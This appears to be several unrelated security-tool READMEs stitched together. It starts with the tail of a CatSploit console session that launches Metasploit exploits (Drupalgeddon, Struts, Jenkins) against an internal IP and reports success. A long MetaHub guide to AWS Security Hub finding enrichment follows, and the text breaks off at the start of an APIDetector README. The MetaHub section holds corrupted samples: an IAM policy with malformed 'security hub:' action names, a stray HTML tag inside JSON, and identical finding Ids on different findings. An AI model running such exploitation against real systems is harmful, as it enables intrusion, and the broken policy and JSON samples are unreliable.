xuowzk       0.0.0.0      192.168.0.10    0.0    24.0   1      exploit/multi/http/struts_dm…
yttv51       0.0.0.0      192.168.0.10    0.01   53.76  2      exploit/multi/http/jenkins_s…
znv76x       0.0.0.0      192.168.0.10    0.01   53.76  2      exploit/multi/http/jenkins_s…
catsploit> scenario detail rmgrof
src host ip  target host ip  eVc    eVd
-----------  --------------  -----  ----
0.0.0.0      192.168.0.10    100.0  32.0
[Steps]
#  step                                   params
-  -------------------------------------  ---------------------
1  exploit/multi/http/drupal_drupageddon  RHOSTS: 192.168.0.10
                                          LHOST: 192.168.10.100
catsploit> attack rmgrof
> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!
catsploit> exit
Bye.
All information and code are provided solely for educational purposes and/or for testing your own systems.
For any inquiry, please contact the email address as follows:
catsploit@nk.MitsubishiElectric.co.jp
MetaHub is an automated contextual security findings enrichment and impact evaluation tool for vulnerability management. You can use it with AWS Security Hub or any ASFF-compatible security scanner. Stop relying on useless severities and switch to impact scoring definitions based on YOUR context.
MetaHub is an open-source security tool for impact-contextual vulnerability management. It can automate the process of contextualizing security findings based on your environment and your needs (YOUR context), identifying ownership, and calculating an impact score based on that context, which you can use for defining prioritization and automation. You can use it with AWS Security Hub or any ASFF security scanner (like Prowler).
MetaHub describes your context by connecting to the affected resources in the affected accounts. It can describe information about your AWS account and organization, the affected resource's tags, related CloudTrail events, the affected resource's configuration, and all their associations: if you are contextualizing a security finding affecting an EC2 instance, MetaHub will not only connect to that instance itself but also to its IAM roles; from there, it will connect to the IAM policies associated with those roles. It will connect to the Security Groups and analyze all their rules, the VPC and the subnets where the instance is running, the volumes, the Auto Scaling groups, and more.
After fetching all the information from your context, MetaHub evaluates certain important conditions for all your resources: exposure, access, encryption, status, environment, and application. Based on those evaluations, combined with the information from all the security findings affecting the resource, MetaHub generates a score for each finding.
Check the following dashboard generated by MetaHub. You have the affected resources, grouping all the security findings affecting them together and the original severity of the finding. After that, you have the Impact Score and all the criteria MetaHub evaluated to generate that score. All this information is filterable, sortable, groupable, downloadable, and customizable.
You can rely on this Impact Score for prioritizing findings (where should you start?), directing attention to critical issues, and automating alerts and escalations.
MetaHub can also filter, deduplicate, group, report, suppress, or update your security findings in automated workflows. It is designed for use as a CLI tool or within automated workflows, such as AWS Security Hub custom actions or AWS Lambda functions.
The following is the JSON output for an EC2 instance; see how MetaHub organizes all the information about its context together, under associations, config, tags, account, cloudtrail, and impact.
In MetaHub, context refers to information about the affected resources like their configuration, associations, logs, tags, account, and more.
MetaHub doesn't stop at the affected resource but analyzes any associated or attached resources. For instance, if there is a security finding on an EC2 instance, MetaHub will not only analyze the instance but also the security groups attached to it, including their rules. MetaHub will examine the IAM roles that the affected resource is using and the policies attached to those roles for any issues. It will analyze the EBS attached to the instance and determine if they are encrypted. It will also analyze the Auto Scaling Groups that the instance is associated with and how. MetaHub will also analyze the VPC, Subnets, and other resources associated with the instance.
The Context module has the capability to retrieve information from the affected resources, affected accounts, and every associated resource. The context module has five main parts: config (which includes associations as well), tags, cloudtrail, and account. By default, config and tags are enabled, but you can change this behavior using the option --context (to enable all the context modules, use --context config tags cloudtrail account). The output of each enabled key will be added under the affected resource.
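For example, a run that enables every context module (the option string is taken verbatim from the text above; any other flags you need are omitted here):
./metahub --context config tags cloudtrail account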
Under the config key, you can find anything related to the configuration of the affected resource. For example, if the affected resource is an EC2 instance, you will see keys like private_ip, public_ip, or instance_profile.
You can filter your findings based on Config outputs using the option --mh-filters-config <key> {True/False}. See Config Filtering.
Under the associations key, you will find all the associated resources of the affected resource. For example, if the affected resource is an EC2 instance, you will find resources like Security Groups, IAM roles, volumes, VPC, subnets, Auto Scaling groups, etc. Each time MetaHub finds an association, it connects to the associated resource again and fetches its own context.
Associations are key to understanding the context and impact of your security findings, such as their exposure.
You can filter your findings based on Associations outputs using the option --mh-filters-config <key> {True/False}. See Config Filtering.
MetaHub relies on AWS Resource Groups Tagging API to query the tags associated with your resources.
Note that not all AWS resource types support this API. You can check the supported services.
Tags are a crucial part of understanding your context. Tagging strategies often include:
If you follow a proper tagging strategy, you can filter and generate interesting outputs. For example, you could list all findings related to a specific team and provide that data directly to that team.
You can filter your findings based on Tags outputs using the option --mh-filters-tags TAG=VALUE. See Tags Filtering.
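For instance, using the TAG=VALUE form above with the Environment=production tag (the same example tag used later in this README):
./metahub --mh-filters-tags Environment=production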
Under the key cloudtrail, you will find critical CloudTrail events related to the affected resource, such as creation events.
The Cloudtrail events that we look for are defined by resource type, and you can add, remove or change them by editing the configuration file resources.py.
For example for an affected resource of type Security Group, MetaHub will look for the following events:
- CreateSecurityGroup: Security Group creation event
- AuthorizeSecurityGroupIngress: Security Group rule authorization event
Under the key account, you will find information about the account where the affected resource is running, such as whether it is part of an AWS Organization, information about its contacts, etc.
MetaHub also focuses on ownership detection. It can determine the owner of the affected resource in various ways. This information can be used to automatically assign a security finding to the correct owner, escalate it, or make decisions based on this information.
An automated way to determine the owner of a resource is critical for security teams. It allows them to focus on the most critical issues and escalate them to the right people in automated workflows. But automating workflows this way is only viable if you have a reliable way to define the impact of a finding, which is why MetaHub also focuses on impact.
The impact module in MetaHub focuses on generating a score for each finding based on the context of the affected resource and all the security findings affecting it. For the context, we define a series of evaluated criteria; you can add, remove, or modify these criteria based on your needs. The impact criteria are combined with a metric generated from all the security findings affecting the affected resource and their severities.
The following are the impact criteria that MetaHub evaluates by default:
Exposure evaluates how the affected resource is exposed to other networks. For example, whether the affected resource is public, part of a VPC, has a public IP, or is protected by a firewall or a security group.
Possible Statuses | Value | Description |
---|---|---|
effectively-public | 100% | The resource is effectively public from the Internet. |
restricted-public | 40% | The resource is public, but there is a restriction like a Security Group. |
unrestricted-private | 30% | The resource is private but unrestricted, like an open security group. |
launch-public | 10% | These are resources that can launch other resources as public. For example, an Auto Scaling group or a Subnet. |
restricted | 0% | The resource is restricted. |
unknown | - | The resource couldn't be checked. |
Access evaluates the resource policy layer. MetaHub checks every available policy, including IAM managed policies, IAM inline policies, resource policies, bucket ACLs, and any association to other resources like IAM roles, whose policies are also analyzed. An unrestricted policy is not only an issue for that policy itself; it affects any other resource that is using it.
Possible Statuses | Value | Description |
---|---|---|
unrestricted | 100% | The principal is unrestricted, without any condition or restriction. |
untrusted-principal | 70% | The principal is an AWS account that is not part of your trusted accounts. |
unrestricted-principal | 40% | The principal is not restricted, defined with a wildcard. There could be conditions restricting it, or other restrictions like S3 public blocks. |
cross-account-principal | 30% | The principal is from another AWS account. |
unrestricted-actions | 30% | The actions are defined using wildcards. |
dangerous-actions | 30% | Some dangerous actions are defined as part of this policy. |
unrestricted-service | 10% | The policy allows an AWS service as principal without restriction. |
restricted | 0% | The policy is restricted. |
unknown | - | The policy couldn't be checked. |
Encryption evaluates the different encryption layers based on each resource type. For example, for some resources it evaluates whether both the at_rest and in_transit encryption configurations are enabled.
Possible Statuses | Value | Description |
---|---|---|
unencrypted | 100% | The resource is not fully encrypted. |
encrypted | 0% | The resource is fully encrypted, including any of its associations. |
unknown | - | The resource encryption couldn't be checked. |
Status evaluates the status of the affected resource in terms of attachment or functioning. For example, for an EC2 instance we evaluate whether the resource is running, stopped, or terminated, while for resources like EBS volumes and Security Groups, we evaluate whether those resources are attached to any other resource.
Possible Statuses | Value | Description |
---|---|---|
attached | 100% | The resource supports attachment and is attached. |
running | 100% | The resource supports running and is running. |
enabled | 100% | The resource supports enabled and is enabled. |
not-attached | 0% | The resource supports attachment, and it is not attached. |
not-running | 0% | The resource supports running, and it is not running. |
not-enabled | 0% | The resource supports enabled, and it is not enabled. |
unknown | - | The resource couldn't be checked for status. |
Environment evaluates the environment where the affected resource is running. By default, MetaHub defines three environments: production, staging, and development, but you can add, remove, or modify these environments based on your needs. MetaHub evaluates the environment based on the tags of the affected resource, the account ID, or the account alias. You can define your own environment definitions and strategy in the configuration file (see Customizing Configuration).
Possible Statuses | Value | Description |
---|---|---|
production | 100% | It is a production resource. |
staging | 30% | It is a staging resource. |
development | 0% | It is a development resource. |
unknown | - | The resource couldn't be checked for environment. |
Application evaluates the application that the affected resource is part of. MetaHub relies on the AWS myApplications feature, which relies on the tag awsApplication, but you can extend this functionality based on your context, for example by defining other tags you use for defining applications or services (like Service or any other), or by relying on the account ID or alias. You can define your application definitions and strategy in the configuration file (see Customizing Configuration).
Possible Statuses | Value | Description |
---|---|---|
unknown | - | The resource couldn't be checked for application. |
As part of the impact score calculation, we also evaluate the total number of security findings and their severities affecting the resource. We use the following formula to calculate this metric:
(SUM of all (Finding Severity / Highest Severity), with a maximum of 1)
For example, if the affected resource has two findings affecting it, one with HIGH and another with LOW severity, the Impact Findings Score will be:
SUM(HIGH (3) / CRITICAL (4) + LOW (0.5) / CRITICAL (4)) = 0.875
MetaHub reads your security findings from AWS Security Hub or any ASFF-compatible security scanner. It then queries the affected resources directly in the affected account to provide additional context. Based on that context, it calculates their impact. Finally, it generates different outputs based on your needs.
Some use cases for MetaHub include:
MetaHub provides a range of ways to list and manage security findings for investigation, suppression, updating, and integration with other tools or alerting systems. To avoid shadowing and duplication, MetaHub organizes related findings together when they pertain to the same resource. For more information, refer to Findings Aggregation.
MetaHub queries the affected resources directly in the affected account to provide additional context using the following options:
MetaHub supports filters on top of these context* outputs to automate the detection of other resources with the same issues. You can filter security findings affecting resources tagged in a certain way (e.g., Environment=production) and combine this with filters based on Config or Associations: for example, whether the resource is public, whether it is encrypted, only if it is part of a VPC, if it is using a specific IAM role, and more. For more information, refer to Config filters and Tags filters.
But that's not all. If you are using MetaHub with Security Hub, you can even combine the previous filters with the Security Hub native filters (AWS Security Hub filtering). You can filter the same way you would with the AWS CLI utility using the option --sh-filters, but in addition, you can save and re-use your filters as YAML files using the option --sh-template.
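A sketch combining both filter layers (the KEY=VALUE form for --sh-filters mirrors the AWS CLI style described above; the specific keys and values are illustrative assumptions):
./metahub --sh-filters RecordState=ACTIVE ResourceType=AwsEc2Instance --mh-filters-tags Environment=production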
If you prefer, with MetaHub you can enrich your findings back in AWS Security Hub using the option --enrich-findings. This action will update your AWS Security Hub findings using the field UserDefinedFields. You can then create filters or Insights directly in AWS Security Hub and take advantage of the contextualization added by MetaHub.
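In its simplest form (any filters to scope which findings get enriched are omitted):
./metahub --enrich-findings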
When investigating findings, you may need to update security findings in bulk. MetaHub allows you to execute bulk updates to AWS Security Hub findings, such as changing the Workflow Status, using the option --update-findings. As an example, say you identified hundreds of security findings about public resources, but based on the MetaHub context, you know those resources are not effectively public, as they are protected by routing and firewalls. You can update all the findings matching your MetaHub query with one command. When updating findings using MetaHub, you also update the field Note of each finding with a custom text for future reference.
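A sketch of such a bulk update (the exact argument syntax for --update-findings is an assumption; check ./metahub -h for the real form):
./metahub --sh-filters RecordState=ACTIVE --update-findings Workflow=NOTIFIED Note="Not effectively public; protected by routing and firewalls"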
MetaHub supports different output modes, some of them JSON-based (json-inventory, json-statistics, json-short, json-full), as well as powerful html, xlsx, and csv outputs. These outputs are customizable; you can choose which columns to show. For example, you may need a report about your affected resources showing only the tags Owner, Service, and Environment. Check the configuration file and define the columns you need.
MetaHub supports multi-account setups. You can run the tool from any environment by assuming roles in your AWS Security Hub master account and your child/service accounts where your resources live. This allows you to fetch aggregated data from multiple accounts using your AWS Security Hub multi-account implementation, while also fetching and enriching those findings with data from the accounts where your affected resources live, based on your needs. Refer to Configuring Security Hub for more information.
MetaHub uses configuration files that let you customize some checks behaviors, default filters, and more. The configuration files are located in lib/config/.
Things you can customize:
lib/config/configuration.py: This file contains the default configuration for MetaHub. You can change the default filters, the default output modes, the environment definitions, and more.
lib/config/impact.py: This file contains the values and their weights for the impact formula criteria. You can modify the values and the weights based on your needs; an illustrative sketch follows this list.
lib/config/resources.py: This file contains definitions for every resource type, like which CloudTrail events to look for.
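As an illustration only (the dictionary name and the MEDIUM weight below are assumptions; the real structure lives in lib/config/impact.py), the severity values used by the impact formula might be expressed as:

# Hypothetical sketch of severity values; only LOW, HIGH and CRITICAL
# are quoted in this document, and the MEDIUM value is an assumed placeholder.
findings_severity_value = {
    "CRITICAL": 4,
    "HIGH": 3,
    "MEDIUM": 1.5,  # assumption, not quoted in this document
    "LOW": 0.5,
}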
MetaHub is a Python3 program. You need to have Python3 installed on your system, along with the required Python modules described in the file requirements.txt.
Requirements can be installed in your system manually (using pip3) or using a Python virtual environment (suggested method).
git clone git@github.com:gabrielsoltz/metahub.git
cd metahub
python3 -m venv venv/metahub
source venv/metahub/bin/activate
pip3 install -r requirements.txt
./metahub -h
deactivate
Next time, you only need steps 4 and 6 to use the program.
Alternatively, you can run this tool using Docker.
MetaHub is also available as a Docker image. You can run it directly from the public Docker image or build it locally.
The available tagging for MetaHub containers are the following:
latest: in sync with the master branch
<x.y.z>: you can find the releases here
stable: this tag always points to the latest release
For running from the public registry, you can run the following command:
docker run -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h
If you are already logged into the AWS host machine, you can seamlessly use the same credentials within a Docker container. You can achieve this by either passing the necessary environment variables to the container or by mounting the credentials file.
For instance, you can run the following command:
docker run -e AWS_DEFAULT_REGION -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_SESSION_TOKEN -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h
On the other hand, if you are not logged in on the host machine, you will need to log in again from within the container itself.
Or you can also build it locally:
git clone git@github.com:gabrielsoltz/metahub.git
cd metahub
docker build -t metahub .
docker run -ti metahub ./metahub -h
MetaHub is Lambda/Serverless ready! You can run MetaHub directly on an AWS Lambda function without any additional infrastructure required.
Running MetaHub in a Lambda function allows you to automate its execution based on your defined triggers.
Terraform code is provided for deploying the Lambda function and all its dependencies.
The Terraform code for deploying the Lambda function is provided under the terraform/ folder.
Just run the following commands:
cd terraform
terraform init
terraform apply
The code will create a zip file for the lambda code and a zip file for the Python dependencies. It will also create a Lambda function and all the required resources.
You can customize MetaHub options for your lambda by editing the file lib/lambda.py. You can change the default options for MetaHub, such as the filters, the Meta* options, and more.
Terraform will create the minimum required permissions for the Lambda function to run locally (in the same account). If you want your Lambda to assume a role in other accounts (for example, if you are executing the Lambda in the Security Hub master account that is aggregating findings from other accounts), you will need to specify the role to assume by adding the option --mh-assume-role in the Lambda function configuration (see the previous step), and adding the corresponding policy to the Lambda role so it is allowed to assume that role.
MetaHub can be run as a Security Hub Custom Action. This allows you to run MetaHub directly from the Security Hub console for a selected finding or for a selected set of findings.
The custom action will then trigger a Lambda function that will run MetaHub for the selected findings. By default, the Lambda function will run MetaHub with the option --enrich-findings
, which means that it will update your findings back with MetaHub outputs. If you want to change this, see Customize Lambda behavior.
You need first to create the Lambda function and then create the custom action in Security Hub.
For creating the lambda function, follow the instructions in the Run with Lambda section.
For creating the AWS Security Hub custom action:
For example, you can use the aws configure option.
aws configure
Or you can export your credentials to the environment.
export AWS_DEFAULT_REGION="us-east-1"
export AWS_ACCESS_KEY_ID="ASXXXXXXX"
export AWS_SECRET_ACCESS_KEY="XXXXXXXXX"
export AWS_SESSION_TOKEN="XXXXXXXXX"
If you are running MetaHub for a single AWS account setup (AWS Security Hub is not aggregating findings from different accounts), you don't need to use any additional options; MetaHub will use the credentials in your environment. Still, if your IAM design requires it, it is possible to log in and assume a role in the same account you are logged in to. Just use the option --sh-assume-role to specify the role, and --sh-account with the same AWS Account ID where you are logged in.
--sh-region: The AWS Region where Security Hub is running. If you don't specify a region, it will use the one configured in your environment. If you are using AWS Security Hub Cross-Region aggregation, you should use that region as the --sh-region option so that you can fetch all findings together.
--sh-account and --sh-assume-role: The AWS Account ID where Security Hub is running and the AWS IAM role to assume in that account. These options are helpful when you are logged in to a different AWS Account than the one where AWS Security Hub is running, or when running AWS Security Hub in a multi-account setup. Both options must be used together. The role provided needs to have enough policies to get and update findings in AWS Security Hub (if needed). If you don't specify a --sh-account, MetaHub will use the account you are logged in to.
--sh-profile: You can also provide your AWS profile name to use for AWS Security Hub. When using this option, you don't need to specify --sh-account or --sh-assume-role, as MetaHub will use the credentials from the profile. If you are using --sh-account and --sh-assume-role, those options take precedence over --sh-profile.
This is the minimum IAM policy you need to read and write from AWS Security Hub. If you don't want to update your findings with MetaHub, you can remove the securityhub:BatchUpdateFindings action.
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"security hub:GetFindings",
"security hub:ListFindingAggregators",
"security hub:BatchUpdateFindings",
"iam:ListAccountAliases"
],
"Resource": [
"*"
]
}
]
}
If you are running MetaHub for a multiple AWS Account setup (AWS Security Hub is aggregating findings from multiple AWS Accounts), you must provide the role to assume for Context queries, because the affected resources are not in the same AWS Account as the AWS Security Hub findings. The --mh-assume-role option will be used to connect with the affected resources directly in the affected account. This role needs enough permissions to describe resources.
The minimum policy needed for context includes the managed policy arn:aws:iam::aws:policy/SecurityAudit and the following actions (a sketch of a matching policy statement follows the list):
tag:GetResources
lambda:GetFunction
lambda:GetFunctionUrlConfig
cloudtrail:LookupEvents
account:GetAlternateContact
organizations:DescribeAccount
iam:ListAccountAliases
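Assembled from the actions listed above, a matching policy statement might look like the following sketch (attach it alongside the SecurityAudit managed policy):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "tag:GetResources",
        "lambda:GetFunction",
        "lambda:GetFunctionUrlConfig",
        "cloudtrail:LookupEvents",
        "account:GetAlternateContact",
        "organizations:DescribeAccount",
        "iam:ListAccountAliases"
      ],
      "Resource": "*"
    }
  ]
}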
MetaHub can read security findings directly from AWS Security Hub using its API. If you don't use Security Hub, you can use any ASFF-based scanner. Most cloud security scanners support the ASFF format. Check with them or leave an issue if you need help.
If you want to read from an input ASFF file, you need to use the options:
./metahub.py --inputs file-asff --input-asff path/to/the/file.json.asff path/to/the/file2.json.asff
You also can combine AWS Security Hub findings with input ASFF files specifying both inputs:
./metahub.py --inputs file-asff securityhub --input-asff path/to/the/file.json.asff
When using a file as input, you can't use the option --sh-filters to filter findings, as this option relies on the AWS API for filtering. You also can't use the options --update-findings or --enrich-findings, as those findings are not in AWS Security Hub. If you are reading from both sources at the same time, only the findings from AWS Security Hub will be updated.
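For reference, a minimal ASFF finding has roughly the following shape (a hand-written sketch with placeholder values, trimmed to the fields MetaHub displays; see the ASFF specification for the full required schema):

{
  "SchemaVersion": "2018-10-08",
  "Id": "example-finding-id",
  "ProductArn": "arn:aws:securityhub:eu-west-1::product/example/example",
  "AwsAccountId": "111122223333",
  "Title": "Example finding title",
  "Severity": { "Label": "HIGH" },
  "Workflow": { "Status": "NEW" },
  "RecordState": "ACTIVE",
  "Resources": [
    { "Type": "AwsS3Bucket", "Id": "arn:aws:s3:::example-bucket" }
  ]
}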
MetaHub can generate different programmatic and visual outputs. By default, all output modes are enabled: json-short, json-full, json-statistics, json-inventory, html, csv, and xlsx.
The outputs will be saved in the outputs/ folder with the execution date.
If you want only to generate a specific output mode, you can use the option --output-modes with the desired output mode.
For example, if you only want to generate the output json-short, you can use:
./metahub.py --output-modes json-short
If you want to generate json-short, json-full and html outputs, you can use:
./metahub.py --output-modes json-short json-full html
Show all findings titles together under each affected resource, along with the AwsAccountId, Region, and ResourceType:
Show all findings with all data. Findings are organized by ResourceId (ARN). For each finding, you will also get: SeverityLabel, Workflow, RecordState, Compliance, Id, and ProductArn:
Show a list of all resources with their ARN.
Show statistics for each field/value. In the output, you will see each field/value and the number of occurrences; for example, the following output shows statistics for six findings.
You can create rich HTML reports of your findings, adding your context as part of them.
HTML Reports are interactive in many ways:
You can create CSV reports of your findings, adding your context as part of them.
Similar to CSV but with more formatting options.
You can customize which Context keys to unroll as columns for your HTML, CSV, and XLSX outputs using the options --output-tag-columns and --output-config-columns (as a list of columns). If the keys you specified don't exist for the affected resource, they will be empty. You can also configure these columns by default in the configuration file (see Customizing Configuration).
For example, you can generate an HTML output with Tags and add "Owner" and "Environment" as columns to your report using:
./metahub --output-modes html --output-tag-columns Owner Environment
You can filter the security findings and resources that you get from your source in different ways and combine all of them to get exactly what you are looking for, then re-use those filters to create alerts.
MetaHub supports filtering AWS Security Hub findings in the form of KEY=VALUE using the option --sh-filters, the same way you would filter using the AWS CLI but limited to the EQUALS comparison. If you want another comparison, use the option --sh-template (see Security Hub Filtering using YAML templates).
You can check available filters in AWS Documentation
./metahub --sh-filters <KEY=VALUE>
If you don't specify any filters, default filters are applied: RecordState=ACTIVE WorkflowStatus=NEW
Passing filters using this option resets the default filters. If you want to add filters to the defaults, you need to specify them in addition to the default ones. For example, adding SeverityLabel to the default filters:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
If a value contains spaces, you should specify it using double quotes: ProductName="Security Hub"
You can add how many different filters you need to your query and also add the same filter key with different values:
Examples:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL SeverityLabel=HIGH
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL AwsAccountId=1234567890
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW Title="EC2.22 Unused EC2 security groups should be removed"
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceId="arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890"
./metahub --sh-filters Id="arn:aws:securityhub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.19/finding/01234567890-1234-1234-1234-01234567890"
./metahub --sh-filters ComplianceStatus=FAILED
MetaHub lets you create complex filters using YAML files (templates) that you can re-use when needed. YAML templates let you write filters using any comparison supported by AWS Security Hub, like 'EQUALS' | 'PREFIX' | 'NOT_EQUALS' | 'PREFIX_NOT_EQUALS'. You can call your YAML file using the option --sh-template <FILE>.
You can find examples under the folder templates.
./metahub --sh-template templates/default.yml
MetaHub supports Config filters (and associations) using KEY=VALUE, where the value can only be True or False, using the option --mh-filters-config. You can use as many filters as you want and separate them using spaces. If you specify more than one filter, you will get all resources that match all filters.
Config filters only support True or False values:
True: the resource is associated with the check or has data.
False: the resource is not associated with the check or has no data.
Config filters run after AWS Security Hub filters:
1. MetaHub fetches the findings based on your --sh-filters (or the default ones).
2. MetaHub then applies your --mh-filters-config to the affected resources, so the result is a subset of the resources from point 1.
Examples:
Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW), only if they are associated to Network Interfaces (network_interfaces=True):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-config network_interfaces=True
Get all S3 Buckets (ResourceType=AwsS3Bucket) only if they are public (public=True):
./metahub --sh-filters ResourceType=AwsS3Bucket --mh-filters-config public=True
MetaHub supports Tags filters in the form of KEY=VALUE, where KEY is the tag name and VALUE is the tag value. You can use as many filters as you want and separate them using spaces. Specifying multiple filters will give you all resources that match at least one filter.
Tags filters run after AWS Security Hub filters:
1. MetaHub fetches the findings based on your --sh-filters (or the default ones).
2. MetaHub then applies your --mh-filters-tags to the affected resources, so the result is a subset of the resources from point 1.
Examples:
Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW), only if they are tagged with a tag Environment and value Production:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-tags Environment=Production
You can use MetaHub to update the workflow status of your AWS Security Hub findings (NOTIFIED, NEW, RESOLVED, SUPPRESSED) with a single command. You will use the --update-findings option to update all the findings from your MetaHub query. This means you can update one, ten, or thousands of findings using only one command. The AWS Security Hub API is limited to 100 findings per update, so MetaHub splits your results into chunks of 100 items to work around this limitation and updates your findings regardless of the amount.
For example, using the following filter: ./metahub --sh-filters ResourceType=AwsSageMakerNotebookInstance RecordState=ACTIVE WorkflowStatus=NEW, I found two affected resources with three findings each, making six Security Hub findings in total.
Running the following update command will update those six findings' workflow status to NOTIFIED with a Note:
./metahub --update-findings Workflow=NOTIFIED Note="Enter your ticket ID or reason here as a note that you will add to the finding as part of this update."
The --update-findings option will ask you for confirmation before updating your findings. You can skip this confirmation by using the option --no-actions-confirmation.
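Under the hood, the 100-findings-per-call limit conceptually reduces to a chunked loop like this boto3 sketch (an illustration, not MetaHub's actual code; the identifiers and note text are placeholders):

import boto3

securityhub = boto3.client("securityhub")

def update_in_chunks(finding_identifiers, status, note_text):
    # BatchUpdateFindings accepts at most 100 findings per call,
    # so split the identifiers into chunks of 100.
    for i in range(0, len(finding_identifiers), 100):
        securityhub.batch_update_findings(
            FindingIdentifiers=finding_identifiers[i:i + 100],
            Workflow={"Status": status},
            Note={"Text": note_text, "UpdatedBy": "MetaHub"},
        )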
You can use MetaHub to enrich your AWS Security Hub findings back with Context outputs using the option --enrich-findings. Enriching your findings means updating them directly in AWS Security Hub. MetaHub uses the UserDefinedFields field for this.
By enriching your findings directly in AWS Security Hub, you can take advantage of features like Insights and Filters by using the extra information not available in Security Hub before.
For example, suppose you want to enrich all AWS Security Hub findings with WorkflowStatus=NEW, RecordState=ACTIVE, and ResourceType=AwsS3Bucket that are public (public=True) with Context outputs:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsS3Bucket --mh-filters-config public=True --enrich-findings
The --enrich-findings option will ask you for confirmation before enriching your findings. You can skip this confirmation by using the option --no-actions-confirmation.
Working with Security Findings sometimes introduces the problem of Shadowing and Duplication.
Shadowing is when two checks refer to the same issue, but one in a more generic way than the other.
Duplication is when you use more than one scanner and get the same issue reported more than once.
Think of a Security Group with port 3389/TCP open to 0.0.0.0/0. Let's use Security Hub findings as an example.
If you are using one of the default Security Standards, like AWS-Foundational-Security-Best-Practices, you will get two findings for the same issue:
EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports
EC2.19 Security groups should not allow unrestricted access to ports with high risk
If you are also using the standard CIS AWS Foundations Benchmark, you will also get an extra finding:
4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389
Now, imagine that SG is not in use. In that case, Security Hub will show an additional fourth finding for your resource!
EC2.22 Unused EC2 security groups should be removed
So now you have four findings in your dashboard for one resource!
Suppose you are working with multi-account setups and many resources. In that case, this could result in many findings that refer to the same thing without adding any extra value to your analysis.
MetaHub aggregates security findings under the affected resource.
This is how MetaHub shows the previous example with output-mode json-short:
"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
"EC2.19 Security groups should not allow unrestricted access to ports with high risk",
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports",
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389",
"EC2.22 Unused EC2 security groups should be removed"
],
"AwsAccountId": "01234567890",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}
This is how MetaHub shows the previous example with output-mode json-full:
"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
{
"EC2.19 Security groups should not allow unrestricted access to ports with high risk": {
"SeverityLabel": "CRITICAL",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",< br/> "Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.22 Unused EC2 security groups should be removed": {
"SeverityLabel": "MEDIUM",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
}
],
"AwsAccountId": "01234567890",
"AwsAccountAlias": "obfuscated",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}
Your findings are combined under the ARN of the affected resource, resulting in only one result, or one non-compliant resource.
You can now work in MetaHub with all four findings together as if they were only one. For example, you can update the Workflow Status of these four findings using only one command: see Updating Workflow Status.
You can follow this guide if you want to contribute to the Context module.
APIDetector is a powerful and efficient tool designed for testing exposed Swagger endpoints in various subdomains with unique smart capabilities to detect false-positives. It's particularly useful for security professionals and developers who are engaged in API testing and vulnerability scanning.
Before running APIDetector, ensure you have Python 3.x and pip installed on your system. You can download Python here.
Clone the APIDetector repository to your local machine using:
git clone https://github.com/brinhosa/apidetector.git
cd apidetector
pip install requests
Run APIDetector using the command line. Here are some usage examples:
